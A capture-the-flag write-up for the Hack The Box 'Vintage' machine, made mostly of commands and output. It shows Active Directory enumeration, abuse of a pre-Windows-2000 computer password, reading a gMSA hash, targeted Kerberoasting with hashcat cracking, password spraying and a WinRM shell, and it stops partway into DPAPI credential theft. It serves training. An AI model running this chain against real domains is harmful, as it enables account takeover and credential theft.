HTB | Vintage
Machine - https://app.hackthebox.com/machines/Vintage
IP - 10.10.11.45
Machine Information - As is common in real life Windows pentests, you will start the Vintage box with credentials for the following account: P.Rosa / Rosaisbest123
NMAP
└─$ nmap -sT -p- --min-rate 10000 10.10.11.45 -Pn -oA nmap_ports
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-07-25 19:08 IST
Nmap scan report for 10.10.11.45
Host is up (0.85s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49668/tcp open unknown
49674/tcp open unknown
49685/tcp open unknown
56155/tcp open unknown
56230/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 273.80 seconds└─$ nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49668,49674,49685,56155,56230 10.10.11.45 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-07-25 19:16 IST
Nmap scan report for 10.10.11.45
Host is up (0.60s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-25 13:46:52Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49685/tcp open msrpc Microsoft Windows RPC
56155/tcp open msrpc Microsoft Windows RPC
56230/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: -2s
| smb2-time:
| date: 2025-07-25T13:47:50
|_ start_date: N/A
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 133.47 secondsSMB
└─$ netexec smb 10.10.11.45 -u 'P.Rosa' -p 'Rosaisbest123'
SMB 10.10.11.45 445 10.10.11.45 [*] x64 (name:10.10.11.45) (domain:10.10.11.45) (signing:True) (SMBv1:False) (NTLM:False)
SMB 10.10.11.45 445 10.10.11.45 [-] 10.10.11.45\\P.Rosa:Rosaisbest123 STATUS_NOT_SUPPORTED (NTLM:False) shows that NTLM auth is disabled. I’ll try with Kerberos and it works:
└─$ impacket-getTGT vintage.htb/'P.Rosa':'Rosaisbest123'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in P.Rosa.ccache
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ cat krb5.conf
[libdefaults]
dns_lookup_kdc = false
dns_lookup_realm = false
default_realm = VINTAGE.HTB
[realms]
VINTAGE.HTB = {
kdc = dc01.vintage.htb
admin_server = dc01.vintage.htb
default_domain = vintage.htb
}
[domain_realm]
.vintage.htb = VINTAGE.HTB
vintage.htb = VINTAGE.HTB
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ export KRB5_CONFIG=./krb5.conf
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ export KRB5CCNAME=P.Rosa.ccache
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ netexec smb dc01.vintage.htb -u 'P.Rosa' -p 'Rosaisbest123' -k
SMB dc01.vintage.htb 445 dc01 [*] x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc01.vintage.htb 445 dc01 [+] vintage.htb\\P.Rosa:Rosaisbest123 enum shares
└─$ netexec smb dc01.vintage.htb -u 'P.Rosa' -p 'Rosaisbest123' -k --shares
SMB dc01.vintage.htb 445 dc01 [*] x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc01.vintage.htb 445 dc01 [+] vintage.htb\\P.Rosa:Rosaisbest123
SMB dc01.vintage.htb 445 dc01 [*] Enumerated shares
SMB dc01.vintage.htb 445 dc01 Share Permissions Remark
SMB dc01.vintage.htb 445 dc01 ----- ----------- ------
SMB dc01.vintage.htb 445 dc01 ADMIN$ Remote Admin
SMB dc01.vintage.htb 445 dc01 C$ Default share
SMB dc01.vintage.htb 445 dc01 IPC$ READ Remote IPC
SMB dc01.vintage.htb 445 dc01 NETLOGON READ Logon server share
SMB dc01.vintage.htb 445 dc01 SYSVOL READ Logon server share We can also get the users list
└─$ netexec smb dc01.vintage.htb -u 'P.Rosa' -p 'Rosaisbest123' -k --users
SMB dc01.vintage.htb 445 dc01 [*] x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc01.vintage.htb 445 dc01 [+] vintage.htb\\P.Rosa:Rosaisbest123
SMB dc01.vintage.htb 445 dc01 -Username- -Last PW Set- -BadPW- -Description-
SMB dc01.vintage.htb 445 dc01 Administrator 2024-06-08 11:34:54 0 Built-in account for administering the computer/domain
SMB dc01.vintage.htb 445 dc01 Guest 2024-11-13 14:16:53 0 Built-in account for guest access to the computer/domain
SMB dc01.vintage.htb 445 dc01 krbtgt 2024-06-05 10:27:35 0 Key Distribution Center Service Account
SMB dc01.vintage.htb 445 dc01 M.Rossi 2024-06-05 13:31:08 0
SMB dc01.vintage.htb 445 dc01 R.Verdi 2024-06-05 13:31:08 0
SMB dc01.vintage.htb 445 dc01 L.Bianchi 2024-06-05 13:31:08 0
SMB dc01.vintage.htb 445 dc01 G.Viola 2024-06-05 13:31:08 0
SMB dc01.vintage.htb 445 dc01 C.Neri 2024-06-05 21:08:13 0
SMB dc01.vintage.htb 445 dc01 P.Rosa 2024-11-06 12:27:16 0
SMB dc01.vintage.htb 445 dc01 svc_sql 2025-07-25 14:52:08 0
SMB dc01.vintage.htb 445 dc01 svc_ldap 2024-06-06 13:45:27 0
SMB dc01.vintage.htb 445 dc01 svc_ark 2024-06-06 13:45:27 0
SMB dc01.vintage.htb 445 dc01 C.Neri_adm 2024-06-07 10:54:14 0
SMB dc01.vintage.htb 445 dc01 L.Bianchi_adm 2024-11-26 11:40:30 0
SMB dc01.vintage.htb 445 dc01 [*] Enumerated 14 local users: VINTAGEBloodhound
─$ bloodhound-python -u 'P.Rosa' -p 'Rosaisbest123' -d vintage.htb -ns 10.10.11.45 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: vintage.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.vintage.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc01.vintage.htb
INFO: Found 16 users
INFO: Found 58 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: FS01.vintage.htb
INFO: Querying computer: dc01.vintage.htb
WARNING: Could not resolve: FS01.vintage.htb: The DNS query name does not exist: FS01.vintage.htb.
INFO: Done in 01M 28S
INFO: Compressing output into 20250725203416_bloodhound.zipInterestingly there are two computers
Foothold/ Shell
Shell as C.Neri
Weak Permission Pre2K
On looking at FS01$ we found that FS01.VINTAGE@HTB -> MemberOf -> PRE-WINDOWS 2000 COMPATIBLE ACCESS@VINTAGE.HTB
When a new computer account is configured as "pre-Windows 2000 computer", its password is set based on its name (i.e. lowercase computer name without the trailing
$). When it isn't, the password is randomly generated.
Let’s try to authenticate via fs01 as password
└─$ netexec ldap vintage.htb -u 'FS01$' -p 'fs01' -k
LDAP vintage.htb 389 DC01 [*] None (name:DC01) (domain:vintage.htb)
LDAP vintage.htb 389 DC01 [+] vintage.htb\\FS01$:fs01bingo!!! It worked
Auth as GMSA01$
FS01.VINTAGE@HTB -> MemberOf -> DOMAIN COMPUTERS@VINTAGE.HTB -> ReadGMSAPassword -> GMSA01$@VINTAGE.HTB
Let’s msDS-ManagedPassword of GMSA01$
└─$ kinit 'FS01$@VINTAGE.HTB'
Password for FS01$@VINTAGE.HTB:
└─$ bloodyAD --host dc01.vintage.htb -d vintage.htb -u 'FS01$' -p 'fs01' -k get object --resolve-sd 'GMSA01$' --attr msDS-ManagedPassword
distinguishedName: CN=gMSA01,CN=Managed Service Accounts,DC=vintage,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:5008d30496b4c5069ce1fc187b5b5960
msDS-ManagedPassword.B64ENCODED: bf1cBrHgnrALWx1WFDnvyHlBZcnkH+3VWYL4yBPdXcXgE7ENWHpWc03uhzxvXLrT5eh71spfFnajFbFuYuHCk2bczzZnBOeruwpF5vpYWmmULhBQoBvyxVWvr2MwOcHOyS7LQYMZdAlJ8k0Dg/2J3ie5SJFNM+Sb7M+Nx+zLSG3A7lYcdYcLS5ed0D8jw1TFB4g4+S0pqNRMjXp2b3HpJbHBFnn6wTDKrDiOZaG/DJHDODoCG0oAncE43Rtpf5lve49jd+m8QGqbQXmQEqCTH/CPS5/n6TKQgqzIMyE8LaxMK3s4UXJAbh8wlskq7j27jD61W7V0JMeMT/dvQu20Jg==Let’s try to authenticate
└─$ netexec smb dc01.vintage.htb -u 'gmsa01$' -H '5008d30496b4c5069ce1fc187b5b5960' -k
SMB dc01.vintage.htb 445 dc01 [*] x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc01.vintage.htb 445 dc01 [+] vintage.htb\\gmsa01$:5008d30496b4c5069ce1fc187b5b5960 GenericWrite / AddSelf
GMSA01$@VINTAGE.HTB -> GenericWrite/ AddSelf -> SERVICEMANAGERS@VINTAGE.HTB
Let’s GMSA01$@VINTAGE.HTB to SERVICEMANAGERS group
└─$ impacket-getTGT vintage.htb/'gmsa01$' -hashes :5008d30496b4c5069ce1fc187b5b5960 -dc-ip 10.10.11.45
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in gmsa01$.ccache
└─$ export KRB5CCNAME=gmsa01\\$.ccache
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ klist
Ticket cache: FILE:gmsa01$.ccache
Default principal: gmsa01$@VINTAGE.HTB
Valid starting Expires Service principal
07/25/25 21:17:53 07/26/25 07:17:53 krbtgt/VINTAGE.HTB@VINTAGE.HTB
renew until 07/26/25 21:17:53
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ bloodyAD --host dc01.vintage.htb -d vintage.htb -k add groupMember SERVICEMANAGERS 'gmsa01$'
[+] gmsa01$ added to SERVICEMANAGERSGenericAll
SERVICEMANAGERS@VINTAGE.HTB -> GenericAll -> SVC_ARK@VINTAGE.HTB / SVC_LDAP@VINTAGE.HTB / SVC_SQL@VINTAGE.HTB
Targeted Kerberoasting on SVC_SQL
We can try Targeted Kerberoasting on SVC_*, but first, we need to enable SVC_SQL@VINTAGE.HTB
remember to get a new TGT for GSMA01$
└─$ bloodyAD --host dc01.vintage.htb -d vintage.htb -k remove uac svc_sql -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from svc_sql's userAccountControlfor targeted Kerberoasting, I need to set SPN
└─$ bloodyAD -d vintage.htb -k --host dc01.vintage.htb -u 'GMSA01$' -p 5008d30496b4c5069ce1fc187b5b5960 -f rc4 set object svc_ldap servicePrincipalName -v 'http/whateverldap'
[+] svc_ldap's servicePrincipalName has been updated
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ bloodyAD -d vintage.htb -k --host dc01.vintage.htb -u 'GMSA01$' -p 5008d30496b4c5069ce1fc187b5b5960 -f rc4 set object svc_ark servicePrincipalName -v 'http/whateverark'
[+] svc_ark's servicePrincipalName has been updated
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ bloodyAD -d vintage.htb -k --host dc01.vintage.htb -u 'GMSA01$' -p 5008d30496b4c5069ce1fc187b5b5960 -f rc4 set object svc_sql servicePrincipalName -v 'http/whateversql'
[+] svc_sql's servicePrincipalName has been updatedNow let’s perform Taregeted Kerberoasting
└─$ netexec ldap dc01.vintage.htb -u 'gmsa01$' -H '5008d30496b4c5069ce1fc187b5b5960' -k --kerberoasting kerberoast.txt
LDAP dc01.vintage.htb 389 DC01 [*] None (name:DC01) (domain:vintage.htb)
LDAP dc01.vintage.htb 389 DC01 [+] vintage.htb\\gmsa01$:5008d30496b4c5069ce1fc187b5b5960
LDAP dc01.vintage.htb 389 DC01 [*] Skipping disabled account: krbtgt
LDAP dc01.vintage.htb 389 DC01 [*] Total of records returned 3
LDAP dc01.vintage.htb 389 DC01 [*] sAMAccountName: svc_ark, memberOf: CN=ServiceAccounts,OU=Pre-Migration,DC=vintage,DC=htb, pwdLastSet: 2024-06-06 19:15:27.913095, lastLogon: <never>
LDAP dc01.vintage.htb 389 DC01 $krb5tgs$23$*svc_ark$VINTAGE.HTB$vintage.htb\\svc_ark*$54f5294d4c8ae1547c011a83cb69c460$db3dab3c040181767226c5ef793cdec183612ebef7189306183898dd9e777172a2930fd6befab85857de9ca7c5a7bc5697a555d35b227bd1e5056a1fa14215f7a7980df3715e365a590c536f13b1420bf7180fd6148764cf85b25094e5cfc57314feecd460d6bf3723cfd1d30e14726790b866e15db5e2a650dfb579056f133fae4fea01af2b9234b2db04411f729e93e651f40175076dfe3b977b6196c85c338daafb129c9f25d13d013c94308cdc43802fe67eda41f0596ada5b2557d378330b225a4db1829035798bdd7f363b050b27548b9b9da9f84bc55a32a5c1fd659b1a2d7f45b76f6435b56e626579e906d9b8ae18f18c86fe2f0da671fae00c892ef195989cd5e3a8d32d211313f6ffe2094a37cb396abcd97c73bf8b226c3e1ef4bf0bce69c821183d477669d1adbd6ae0d9e8b1b27e2856d20cbf56ade48a237a6551f855bd8547f6d6499fd8ca6973847f3950740eaba8a6c4a0877e9537b22550c515cdacad339f563b69abe3eb01d6aa97df9b736c20db5bc2c1e3bd50c6a4e1955f51a6b57acd242ed45a38e065cae9fed453302d821805038c98a91ebefb0af2d300c5e8756c9bd3a970e78540b14be66a19c571a68ddaf8221945290ae6a0552ce93481f3828d5c3baf4e3ea73d96f6431977216ac49a67d165e123e443589bde370faf2713fcea1673ceb27affff74e0308280e5a04d0f9b6000d758ef28325730bd0948f2560992ed57ecc982b9f9eb323b4259dbe0928354f239a9c2779214412a78f07e9cd22c216f40fd327b96467b49077248d6045b46539d546d92a39527935a92505f3881c57dc799e4bb3e053fbb39ae90291e04559966115779c819b054dd73896f83447b07e408ee4e2d23ba1938f1ee0c33120c59492f518df56ae5587ae42afe6fb008107e75ccc83bfd97d90bba29f0cac02f9f371eb7edc2842a1c36dbc67178326b9c6d04b5ed3d749b48e3f49782041a90b2cdaac2948aa516a03f8f2c64509e2fb5bffa7ac558d75a31406997224ce6a7f5c733b105cd3b88320084e87a871a9078c71c802eb659043ad071d05dea7f38b01a5fa105f08fcfbbf8f3862f930169e0ca6633937d6baa00a2dd0d399c96828380fdf1ad3cf6c36951e449cb1e515b35f8f84356dba785f215b4599b0a3edbc35e850248ad85ace4c7e9d05053efa7393b83ae55546c02d2124664a0b6547a56f7009e217848fa1d37879026f682d94a55c73a84cb287e6512a68fa64ac4fd2cff54b0297df47d6b44bda4ddf0bd5fd81d07952856f339e96873fdc008dcc68ac4685f0e7f38fe1f3629a7512c68b3cb4b684d9564694179ed5ed032f52afdbe6f7f55fdd8c7f898dce9ed2f6409347100cb15d97be28a126921dbcc35e5b92544b98939904f1d054706af5a90ae0a729edfb1f56b517b125e1d9dfdd05f95b722266982e56f
LDAP dc01.vintage.htb 389 DC01 [*] sAMAccountName: svc_ldap, memberOf: CN=ServiceAccounts,OU=Pre-Migration,DC=vintage,DC=htb, pwdLastSet: 2024-06-06 19:15:27.881830, lastLogon: <never>
LDAP dc01.vintage.htb 389 DC01 $krb5tgs$23$*svc_ldap$VINTAGE.HTB$vintage.htb\\svc_ldap*$e2b1d9ae89f51f33ff6d6d77df159c46$2ceaac10aa07015d6f2f5fff4c2b3da0b96e6d727ad68a72cee8a64e2dfcc8ce7c6adc0e2ed3a3287b80e75040229317de11f812b540fa312ec627edfd7459a1510d42664a89333f038db14c0430af57435392ebb60a74b46efc94ec2934b299ef010a185bf31f9735999fa47155caf319e4c1ac3af7f6ce72bd174dc5c3db547ebfa0c9231698b3cdd253c24dc51f35ed9a8411c490377bd331eb30c04bd486548db18810957d6991fb9e5256aac136207e1f7cb993681e9401df0869de0222cf3e984601b3b74b022787dcc02c426b9c1d86e7cbce44743cb830838a561c3017950d6128c8dfee525f3f6d1832e4a6c18e822fcadf2c5e51ec9494b3d50e4be8ff01924a0c22a6cd5b0922bd2fbb791727295284821d348bbc8fb27c17d54ae1adb3bb66d5380fbef506f8a7b6a639db83e8f37097e7dd29f2cf5b4cde02278b2494ec1819a398a6cea276c373392ecd91b9bc5ceea773c7cc9f70f3cb8f7066403437a4cd0db1bdacbb7bcef5a489119374903eb6d8eae78fea909cf7fb15cd566788fac7dcb74ac9ca280882e6cfae4b21a7e574980b95207ea067dbf300dfd2a98282a3bce7323a34b22566c8c70b0120d146871110db8569fb395d5eb2b31e78d29bb6bce90e4b16dc72392f89ecf64c0a6dd1abf2fd7a80417cef770f0c7cf5590d700fab4f0d9e64aa149512197443060a52fb9f9e80cc6c07f658e3713741553a5a998eeb49c7a1e0d68c02d255b66eeb4fcb2110872c8872913a0231314b8e878ab8798ceecf2e5754449f2cb6e8ce9efcc5438ca2e47fd9e964d0b6ec5fd2d4fdc698efa5e990e1f52d54b170bd585b2c87cdfc2c1020805cfc675d5bfb670a0aa41de062dd5fa29251311b97ffd89355c493b47536d580c7ff4ef03d2d19fdbaf804bea34012c1cb85630bed1cf473652b8716e35320eb279a09ea809ddebaf6d7f40f74c5e8ca01f87a4ed724fda70a6f7acb8522d31b3595d1497ba2fbacca671522e218448f47401f7c16ab1a3ab6ae1ee8f7a1157e70d4c3c2c7aa284e955b7a7cfae2c5dd2e1d6e944427df5dea44b6c29e8c02bd909691d8ef983bf833b725cf8594e9fdd63a1b92d552613d0b4e8802d9291d34bc74cf513deeaa87616f1cfb023f7b4122c65bc8d593f7a806108f7ea5ef1c907e4787b2ae673b39a6e43bb9ce1abf69f5f4b94c22715cc497fd9eabbe840130c8346ed80e00ae908e37b8977b640352e225a2f53a8616befc2c185250b5d0d8b9630532f37355ad70733b235beaded6d37b703ce4df2bfb50cddc5ec408193c570e316473a0ef8a67ff811611c1b100be53cc1afca62209878bdb5cb116e2c05fe0cb76b25faea9794b9b53125c6da1dd17927bf144322316c18f0472e30d21005213686538b0a90857a8d7321359e853cdf50cb6696d79d53e2efc9eed323252b483b65477
LDAP dc01.vintage.htb 389 DC01 [*] sAMAccountName: svc_sql, memberOf: CN=ServiceAccounts,OU=Pre-Migration,DC=vintage,DC=htb, pwdLastSet: 2025-07-25 22:02:06.141659, lastLogon: <never>
LDAP dc01.vintage.htb 389 DC01 $krb5tgs$23$*svc_sql$VINTAGE.HTB$vintage.htb\\svc_sql*$1de69c066d2b07799d11b3bf8e6568d2$26ace3e63f68ddebefbc0d37b3f934219bfd29bbc5b7fb78d94a4d4851df5d982670985b966c2db84dea2570203ac109cb771f3819d07e21a836f7644c87964b689f9522453c31c8c3dd70f002fd6dc79e0b39f3dea132566215f1d37b7b5e85ef8ccfd56cc47da0180e2d8e4b70c9bb1cf471f648b8f7e18807a26b5d5d1ff0175285875164d3d74adf75b1ccb364460524fd9e8f9993cc9d72ce702274f80b2888da9aa153bc072b460914c040c2fa953036f091c6a5c55b90e32610210aa5b9c5be427bffef716b8f3be77d38f907e9e3bbc245b88066cc1388bde4f22881307628123ec6eaaf5d2ef5bf379889a50e411bdb917196f0ffb46ca64603078f97bdc621deb699f31e8abf400dbc1f64f5c6834118af33e7f82d8ec54b883f1c42c3438b4668b829bef18c65d15ef8f7c6ba420fb60b2fe5786d79e25b1632e370799b922fa52e22bb85a755f1dc5007833ecf3c5c691626bdfafcab24f25325e7488360ea3e5c3fe0813227d023bb102a6f6384f1a4aee51bd9f0385511a0b0f2959139fed418e832f93d613fa4865aae7a64fc3d2520c11e0073006763b766ce26a82f9ca75209cb7eb5718a98215aa5b0e9db1c167c34cf8bb7087754976cab4d4341c57353569fc66e35542b42b73a5a49e5fe9ce8c8e300c852f6c61f60af3c9c66042d243b6125cde1c53b99961ef8e66625d0e931b84bc2567d68acbf8bcf23c12cc210d4b9e637c7cdfd0b55e4cdf22a4abe5c36cff0ef5cab949b5baab869169b791a666ba4290df58b4b56045b88bd9a1b348241b8a1e85348dcc4dbab16f1e1112cc3fb853bd517759d05beed5ddb430420acbba2c20e815b5c11bc6f58f05ccdec0003198df2596a7169300d809861befc2e17efda448ddfe85f2193114809073bcc38e01f688584a03e6c770565dfe932d84570cf0785c89488d55b82a4273e8d2ded7adeac89e40a8ac88b03bae44bbd793e064a4215e4d667c3bfad49969b2fc640cfdb76bb37ac917cfeebe7ea3cf324338fdb1dc6f2f950eec9fd415dda5e05bab381e568954d4956b8b5a541ce81c1f7fea74898a0252b63011e0d812de65f6ac9d3eccd6eb03795da3622784b3f837ebdd66047dd32711e720b3b19d9794026eda7d9be2d1a36e36fedc12857d6a839f974c65e1b1dd01bd12b7cba1a68bb72a62554f817f5381d1b3483f9391e4b988840d2528afb5071baa63170a3ceae1bd309b21f2b6f880cc30b6f62552c5740e4ba0a92e9501779ebe17eabc21d821f63ab043b1a43fe2d9c07393695ad954fdb98cb596956b92c2246c94b85e1145561c951cb627129b656b124be9fc877201e608b3e2fdf453c36b98ef8f4adf6add1d0f545abd3cf99b753eec0882471130f345e4f361ee81102fa692082db10dc825113d90c64ac0add6a1a3d2a75314d78605017f3ac69fc668e Crack the Hash
Let’s try to crack the hash
└─$ hashcat kerberoast.txt /home/anurag/stuff/rockyou.txt
<--SNIP-->
$krb5tgs$23$*svc_sql$VINTAGE.HTB$vintage.htb\\svc_sql*$d7f53301a490c2bed7a1e92e7c3fd184$a3ebf628f3d2637825921a66422f05018666d441e1a716c63e34f8fddaf161b65e827e2214a4c3cd37e165c0ff060119ca79ee3eb28985dd3845e44c7f60a4d7dba64312b61ddbdfd2f63ff0e12e8861b740aba480e53926f67dfdfbb8d4970814085b5a359bbd4273667311e4d4f6be1527c989d5f743be69893c3dde6646cca3e4bbe58019c7ee85e8f1de9e753a63f39563373e62067556b9201dd2b59709f9b5a72fe702b83023cafa765bb7a8c294a1dacb2e3c2fd48ff25809850f979ce2d9394bfb49566c9308ed63b18c4ea4ecf11c89a2b045945ea2bdb1396bdfdfcb9bad3e54f33a4c733477fc0426d18191a98c75dc05c87e990fb76f8442471b69e6a9be7c91e738efcb8dacf7008ef3a4accba0b6777cfc15778143a385d1ce708eca4ab4f9b68fd2c74003019d21b9ac02bb163e90d9ae9383d6b05d821e8ac4699a14e74ff37d375bb5003ccc79c0277557123befa6f7e0b8faa07d2d5369a6596947dec92bfdbd64e3f93da7a734bb782b32a182fa539970ff978c05ff5eee5ba5d564016f30bf9a7d5c148ce6fada042be8f10ab231cdf100ef35305f1d931e934abb3f64bef5c23c1c130318ac91bd2879e98c0d572ce71147747484bec99d50e4dda3803c9cb6329594e949f7d12f3540c751fd7fd604b2064443079d16fe98c30e67694727ac3768049ea73fe352f39cbdf13281840185bd85b7d53f4741f94ab3183fbdef12ace64f6df282464d008849e38d7c7c663b29af691807aa0a49ddd30b5002e526d2caf0e50442c27119e3634faed55c51e0cec362d6e4d2407bf1e338e1cce24e324e8e057ee078154b281a639467707105e9bd1651fbc7f50eb6da07ed5f1366109743351608f943d811e9bfbd1eda362bb8de27842a30058f273572872a9150a3d3d810f20462f69194fb9e0111329b1fdccc472da77cd68c7569e02bc1e71f9a88ba873a32094ba9155b9b68e655b3c528a7c30cfbf7c9274e3b32d350e28e5bdb56b255d6309e13bfd38b379f7be57879f72c131699edf89632f071b0d835ecb7efc133e11908adc7ab0de3dcb0c31ea4fbf7104e889f3968b8899ad94f8ea43a951aaf38421408a5a93aa141a0bfb3a66d67cdb5b8ad101b672100cbbaac9c2ce6f52cbc54ece0749a0d810cbf865f5327d36216d13eb17124cb584fa4ce2fb2d4f83cea02d0bcb7081e89405ba770004b3c2b4f557604b921151231817175741ce3de64f87905c67e395ef330be5edef16ce2abe682f068275f535514d0d55afc616bea47e6d0615107a84eed3e3d12a13d9bcb95c1da76412b6f3a3522474a31cddfcd3d3dfaa4782c76bc6baec21c70d53c37a31274dcaff03d658f585bcbffd2ab6e6fa3ab1376ed0a959aa654997f38f0adcbdc66fe2e864454ce189074700917c65ac8c88b47fa19b364613ba801bdfd727cf400:Zer0the0ne
<--SNIP-->found sql_svc password
└─$ netexec smb dc01.vintage.htb -u svc_sql -p 'Zer0the0ne' -k
SMB dc01.vintage.htb 445 dc01 [*] x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc01.vintage.htb 445 dc01 [+] vintage.htb\\svc_sql:Zer0the0ne
passwordspray
Let’s password spray the password of svc_sql for users we got earlier
└─$ netexec smb dc01.vintage.htb -u users.txt -p Zer0the0ne -k --continue-on-success
SMB dc01.vintage.htb 445 dc01 [*] x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc01.vintage.htb 445 dc01 [-] vintage.htb\\L.Bianchi_adm:Zer0the0ne KDC_ERR_PREAUTH_FAILED
SMB dc01.vintage.htb 445 dc01 [-] vintage.htb\\gMSA01$:Zer0the0ne KDC_ERR_PREAUTH_FAILED
SMB dc01.vintage.htb 445 dc01 [-] vintage.htb\\C.Neri_adm:Zer0the0ne KDC_ERR_PREAUTH_FAILED
SMB dc01.vintage.htb 445 dc01 [-] vintage.htb\\svc_ark:Zer0the0ne KDC_ERR_PREAUTH_FAILED
SMB dc01.vintage.htb 445 dc01 [-] vintage.htb\\svc_ldap:Zer0the0ne KDC_ERR_PREAUTH_FAILED
SMB dc01.vintage.htb 445 dc01 [+] vintage.htb\\svc_sql:Zer0the0ne
SMB dc01.vintage.htb 445 dc01 [-] vintage.htb\\P.Rosa:Zer0the0ne KDC_ERR_PREAUTH_FAILED
SMB dc01.vintage.htb 445 dc01 [-] vintage.htb\\krbtgt:Zer0the0ne KDC_ERR_CLIENT_REVOKED
SMB dc01.vintage.htb 445 dc01 [+] vintage.htb\\C.Neri:Zer0the0ne
SMB dc01.vintage.htb 445 dc01 [-] vintage.htb\\G.Viola:Zer0the0ne KDC_ERR_PREAUTH_FAILED
SMB dc01.vintage.htb 445 dc01 [-] vintage.htb\\R.Verdi:Zer0the0ne KDC_ERR_PREAUTH_FAILED
SMB dc01.vintage.htb 445 dc01 [-] vintage.htb\\Administrator:Zer0the0ne KDC_ERR_PREAUTH_FAILED
SMB dc01.vintage.htb 445 dc01 [-] vintage.htb\\L.Bianchi:Zer0the0ne KDC_ERR_PREAUTH_FAILED
SMB dc01.vintage.htb 445 dc01 [-] vintage.htb\\Guest:Zer0the0ne KDC_ERR_CLIENT_REVOKED
SMB dc01.vintage.htb 445 dc01 [-] vintage.htb\\M.Rossi:Zer0the0ne KDC_ERR_PREAUTH_FAILED We are in as C.Neri and got user.txt
└─$ kinit 'C.Neri@VINTAGE.HTB'
Password for C.Neri@VINTAGE.HTB:
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ evil-winrm -i dc01.vintage.htb -r vintage.htb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\C.Neri\\Documents> dir C:\\Users\\C.neri\\Desktop\\
Directory: C:\\Users\\C.neri\\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/7/2024 1:17 PM 2312 Microsoft Edge.lnk
-ar--- 7/25/2025 3:36 PM 34 user.txt
Privilege Escalation
Shell as L.Bianchi_adm
DAPI
My first thought is to use RunasCs.exe to get an interactive logon, but it fails even with the PowerShell script due to AV
Now I will try to get the key and credentials offline and try to decrypt
I’ll need the master key, information about the account, and the encrypted credential. The master key is helped in AppData\\Roaming\\Microsoft\\Protect\\[sid]:
*Evil-WinRM* PS C:\\users\\c.neri\\appdata\\Roaming\\Microsoft\\Protect\\S-1-5-21-4024337825-2033394866-2055507597-1115> ls -force
Directory: C:\\users\\c.neri\\appdata\\Roaming\\Microsoft\\Protect\\S-1-5-21-4024337825-2033394866-2055507597-1115
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 6/7/2024 1:17 PM 740 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847
-a-hs- 6/7/2024 1:17 PM 740 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b
-a-hs- 6/7/2024 1:17 PM 904 BK-VINTAGE
